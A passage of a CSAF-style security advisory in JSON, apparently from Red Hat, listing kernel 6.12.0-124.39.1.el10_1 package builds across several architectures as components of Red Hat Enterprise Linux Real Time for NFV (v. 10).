"product_id": "NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
